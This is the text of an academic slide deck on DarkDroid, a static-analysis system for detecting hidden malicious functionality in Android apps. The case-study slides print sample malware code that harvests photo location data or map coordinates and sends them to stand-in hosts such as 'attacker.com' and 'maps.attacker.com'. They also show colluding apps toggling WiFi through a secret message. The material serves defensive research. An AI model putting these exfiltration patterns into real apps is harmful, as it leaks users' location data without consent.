Divining Intent - 8th Workshop on Embedded Systems Security ...

tibburfrogtownMobile - Wireless

Dec 14, 2013 (3 years and 9 months ago)

87 views

Divining Intent
Exposing Hidden Malicious Functionalityon Android Devices
WilliamRobertson
ACMESWEEK/WESS
29 September 2013
Northeastern University
.
.
1/54
.
Divining Intent
.

Mobile Devices
.
.
2/54
.
Divining Intent
.

Android

79%of all phones sold in 2Q13 were Android devices
[Gartner,August 2013]

Android app revenue increased to more than half of iOS
[Distimo,August 2013]

Android devices are used in increasingly critical roles
.
.
3/54
.
Divining Intent
.

Android Security

Google used opportunity to improve on legacy
platformsecurity

UNIX security model,plus:

Managed runtime

Code signing

Permissions system
.
.
4/54
.
Divining Intent
.

Android Permissions
.
.
5/54
.
Divining Intent
.

Mobile Malware

Data exfiltration

Authentication credentials

Economic attacks

PremiumSMS

Virtual currency

Attacks on user privacy
.
.
6/54
.
Divining Intent
.

Detection Approaches

Power analysis

Programanalysis

Static vs.dynamic

On-device vs.market-based

Tradeoffs in precision and impact on UX
.
.
7/54
.
Divining Intent
.

Outline

Introduction

DarkDroid

Challenges

Modeling Malware

Implicit Flows

Inter-App Flows

Triggers

Case Studies

Conclusion
.
.
8/54
.
Divining Intent
.

DarkDroid
.
.
9/54
.
Divining Intent
.

DarkDroid
Goals

Screen apps submitted to centralized app markets

Flag potentially malicious apps for review

Automatically remediate malicious apps

Harden vulnerable apps against compromise

Address next-generation malware
.
.
10/54
.
Divining Intent
.

DarkDroid
Precise,scalable static analysis

Cannot ignore difficult cases (unlike bug finding)

Analysis directly on bytecode

Minimal a priori assumptions regarding app design

Cannot consider apps in isolation
.
.
11/54
.
Divining Intent
.

DarkDroid
Model malicious behavior

Capture a wide spectrumof attacks fromrealistic
malware

Avoid false positives inherent in positive modeling
Automated instrumentation

Broadens available responses

Wholesale blocking of apps frommarkets

Removal of malicious functionality

Automated protection against newattacks
.
.
12/54
.
Divining Intent
.

Static Analysis
Tracking data flows

Abstract interpretation over all possible programinputs

Flow-sensitive

Path-sensitive

Context-sensitive

Identifies flows fromdata sources to sinks that
potentially represent attacks
.
.
13/54
.
Divining Intent
.

Static Analysis
Flow-sensitive
Analysis respects statement ordering.
public int f() {
int x = 1;
...
x = -1;
...
return x;
}
.
.
14/54
.
Divining Intent
.

Static Analysis
Path-sensitive
Analysis annotates values with path constraints.
public int f(int x) {
if (x < 0)
return -x;
return x;
}
.
.
15/54
.
Divining Intent
.

Static Analysis
Context-sensitive
Analysis propagates facts across method
invocations and distinguishes between call-sites.
public int f() {
int x = g(1);
x = g(-1);
return x;
}
public int g(int x) {
return -x;
}
.
.
16/54
.
Divining Intent
.

Static Analysis
Tracking data flows

Handle not only data flows,but also values

Permissions are too coarse-grained

String,value range analysis
.
.
17/54
.
Divining Intent
.

Static Analysis
Tracking data flows

Handle complex data structures

Standard collection classes

Key-value stores for intent parameters
.
.
18/54
.
Divining Intent
.

Static Analysis
Tracking data flows

Handle user interaction,activities,and intents

Otherwise,data flows can be broken
.
.
19/54
.
Divining Intent
.

Static Analysis
Tracking data flows

Whole systemanalysis

Model interactions between apps

Harden apps given known device configurations
.
.
20/54
.
Divining Intent
.

SystemOverview
.
.
21/54
.
Divining Intent
.

Modeling Malware

Important step is to create a solid threat model

Sources for malicious code examples

Contagio malware dump

Android Malware Genome project

Government red teams

Andrubis

Translate threat model into properties that static
analysis can check
.
.
22/54
.
Divining Intent
.

Andrubis

Dynamic analysis platformfor Android apps

Leverages Anubis malware analysis infrastructure

Runs uploaded apps in emulated environment

Produces concise reports of observed suspicious
behaviors

Currently processes thousands apps/day
.
.
23/54
.
Divining Intent
.

Modeling Malware

Flows defined in terms of sources and sinks

Source classes

Filesystem,network,SMS,bluetooth,GPS,microphone,
camera,UI,etc.

Sink classes

Filesystem,network,SMS,log,UI,etc.
.
.
24/54
.
Divining Intent
.

Modeling Language
#storage
<=FileInputStream <=Context:openFileInput(<=String path) {
label(return,path);
}
#network
<=URLConnection <=URL:openConnection() {
label(return,this);
output(this);
}
.
.
25/54
.
Divining Intent
.

App Structure

Android apps written as collections of event-driven or
asynchronous components

Activity,Service,BroadcastReceiver

AsyncTask,Thread,Runnable,Callable

requestLocationUpdates!onLocationChanged

Invocations between components occur through intents

Abstract action vs.explicit target

Data parameters in Bundles
.
.
26/54
.
Divining Intent
.

App Lifecycle

Apps have well-defined lifecycle

Manifests as ordered sequence of callbacks fromruntime

e.g.,onCreate!onStart!…!onStop!onDestroy

Failing to model this equivalent to flowinsensitivity in
the large
.
.
27/54
.
Divining Intent
.

Implicit Flows

Analysis platformmust handle implicit flows through
framework

Otherwise,malicious flows can be lost!

Including framework code in analysis is infeasible

Explicit registrations are straightforward

takePicture!onPictureTaken

Many methods are called implicitly and require
specification

Recovering these manually is tedious and error-prone
.
.
28/54
.
Divining Intent
.

The Clicker

We use dynamic analysis to identify previously
unknown implicit flows

Increases coverage,preserves precision of static analysis

Combination of instrumentation and the Clicker

UI interactions driven by the Clicker

Record exit points fromapps,entry points into runtime

Trace events binned by thread
.
.
29/54
.
Divining Intent
.

The Clicker

Driving Android apps in a realistic way is important

Existing tools (Monkey,MonkeyRunner)

Monkey randomgenerates click events

MonkeyRunner requires manual specification

Clicker automatically extracts the current context of
Dalvik bytecode

Generates likely UI events given current screen contents
.
.
30/54
.
Divining Intent
.

Implicit Flows
<=AsyncTask(Object[] args) {
@init { void onPreExecute();}
@run {
Object doInBackground(Object[] args);
void onProgressUpdate(Object[] args);
}
@fini {
void onCancelled(Object obj);
void onPostExecute();
}
@reg {
AsyncTask execute(Object[] args) {
<=AsyncTask(this=this,args=args);
}
}
}
.
.
31/54
.
Divining Intent
.

String Analysis

Resolving implicit flows often requires string analysis

Also useful for resolving reflection targets,URLs,FS paths,
etc.

Platformuses Z3-STR [Zheng13]

Constraints recorded during static analysis,dumped to Z3 as
necessary

append,substring,reverse,charAt,delete,…

Results incorporated into subsequent analysis
.
.
32/54
.
Divining Intent
.

String Analysis

An important application of string analysis is intent
resolution

Intents used to pass messages between app
components

Intent actions are strings!

android.intent.action.VIEW,
android.intent.action.SEND,…

If actions cannot be resolved,a conservative analysis
must explore all possible target components

Increased analysis runtime,decreased precision
.
.
33/54
.
Divining Intent
.

Inter-App Flows

Prior work has shown that permission re-delegation is
an important class of attack on Android

Implies that apps should not only be considered in isolation

Multi-app analysis allows us to derive security policies
for collections of apps

Analysis first performed for individual apps

Constraints propagated along possible inter-app flows
.
.
34/54
.
Divining Intent
.

Inter-App Flows
.
.
35/54
.
Divining Intent
.

Inter-App Flows
.
.
36/54
.
Divining Intent
.

Inter-App Flows
.
.
37/54
.
Divining Intent
.

Inter-App Flows
.
.
38/54
.
Divining Intent
.

Inter-App Flows
.
.
39/54
.
Divining Intent
.

Performance
2K apps fromthe Google Play store.96%of dynamic edges covered.
.
.
40/54
.
Divining Intent
.

Sample A

App to display pictures loaded fromthe Internet

When a particular picture is selected,time and location
data is extracted fromall pictures on SDcard

When a particular button is pressed,extracted data is
leaked to the attacker
.
.
41/54
.
Divining Intent
.

Sample A
public void nextButton(View view) {
...
if (curIdx == 2) {
curIdx++;
x = getImages();
}
}
public String getImages() {
File pics = new File(sd,”DCIM/Camera”);
...
data += (ExifInterface) e.getLatLong(item);
...
return data;
}
public void aboutButton(View view) {
String host = ”attacker.com”;
String url = host + ”?” + x;
startActivity(new Intent(Intent.ACTION_VIEW,Uri.parse(url)));
}
.
.
42/54
.
Divining Intent
.

Sample A
”inputs”:[{
”tags”:[”#location”],
”target_method”:”ExifInterface.getLatLong(float[]):boolean”
}],
”outputs”:[{
”tags”:[”#network”,”#intent”],
”target_method”:”SampleA.startActivity(android.content.Intent):void”
}]
.
.
43/54
.
Divining Intent
.

Sample B

Mapping app that provides directions between
arbitrary points selected by the user

When a button is clicked,an intent containing the
location data is generated to invoke the Google Maps
API

This intent data is then modified to leak the location
data to the attacker
.
.
44/54
.
Divining Intent
.

Sample B
String url = “http://maps.google.com/maps?saddr=“ + params;
Intent intent = new Intent(android.content.Intent.ACTION_VIEW,Uri.parse(url));
startActivity(intent);
URI uri = new URI(update(url));
new Updater().execute(uri);
//Transform the legitimate URL to URL pointing to maps.attacker.com
private String update(String x) {...}
//Send an HTTP GET request to the malicious domain on another thread
private class Updater extends AsyncTask<URI,Void,Void> {
protected Void doInBackground() {...}
}
.
.
45/54
.
Divining Intent
.

Sample B
”inputs”:[{
”target_method”:”GeoPoint:getLongitudeE6()”,
”tags”:[”#location”]
}],
”outputs”:[{
”target_method”:Uri:parse(String uri),
”data”:”http://maps.google.com/maps?saddr=.*,.*&daddr=.*,.*”,
”tags”:[”#network”]
},{
”target_method”:”void Context:startActivity(Intent intent)”,
”data”:”action=android.intent.action.VIEW”,
”tags”:[”#intent”]
}]
.
.
46/54
.
Divining Intent
.

Sample B
”inputs”:[{
”target_method”:”GeoPoint:getLongitudeE6()”,
”tags”:[”#location”]
}],
”outputs”:[{
”target_method”:Uri:parse(String uri),
”data”:”http://maps.attacker.com/maps?saddr=.*,.*&daddr=.*,.*”,
”tags”:[”#network”]
},{
”call_site”:”SampleB$Updater.doInBackground(URI[]):Void”,
”target_method”:”HttpClient:execute(HttpUriRequest req)”,
”tags”:[”#network”]
}]
.
.
47/54
.
Divining Intent
.

Sample C

App to remotely administrate device features

Turn on/off wireless,bluetooth,etc.

Malicious behavior implemented in another app!

Intents sent to colluding app under particular conditions

Requires handling inter-app flows,string analysis
.
.
48/54
.
Divining Intent
.

Sample C
public static final int SECRET_MSG = 123456;
private ServiceConnection conn = new ServiceConnection() {
public void onServiceConnected(...) {
bundle.putBoolean(”data”,false);
Message msg = Message.obtain(null,SECRET_MSG,0,0);
msg.setData(bundle);
}
action = ”SampleB.RECEIVE”;
bindService(new Intent(action),conn,Context.BIND_AUTO_CREATE);
<service android:name=”SampleB.Receiver”>
<intent filter>
<action android:name =”SampleB.RECEIVE”/>
</intentfilter>
</service>
.
.
49/54
.
Divining Intent
.

Sample C
public void handleMessage(Message msg) {
switch (msg.what) {
case TAG://TAG = 123456
try {
Context ctxt = createPackageContext(”nonexistent”,...);
} catch (NameNotFoundException e) {
Bundle data = msg.getData();
final Boolean x = data.getBoolean(”data”);
setWifiEnabled(getApplicationContext(),x);
}
}
}
.
.
50/54
.
Divining Intent
.

Sample C
”inputs”:[{
”data”:”action=SampleB.RECEIVE”,
”tags”:[”#static”]
},{
”call_site_method”:”SampleB.ActivityA$1.onServiceConnected(...):void”,
”target_method”:”void Message:setData(Bundle data)”,
”data”:”data=false”
}]
”outputs”:[{
”target_method”:”bindService(Intent,...):boolean”
”tags”:[”#intent”]
}]
.
.
51/54
.
Divining Intent
.

Sample C
”inputs”:[{
”tags”:[”#intent”],
”target_method”:”Message.getData():Bundle”,
”data”:”data=false”
}],
”outputs”:[{
”tags”:[”#wifi”],
”target_method”:”WifiManager.setWifiEnabled(boolean):boolean”
}]
.
.
52/54
.
Divining Intent
.

Conclusions

Android devices are an increasingly targeted platform
by attackers

Many interesting challenges

App lifecycle

Inter-app communication

Defensive techniques must evolve to keep pace with
rapid evolution of attacks
.
.
53/54
.
Divining Intent
.

Thank You!
http://seclab.ccs.neu.edu/
http://wkr.name/
.
.
54/54
.
Divining Intent
.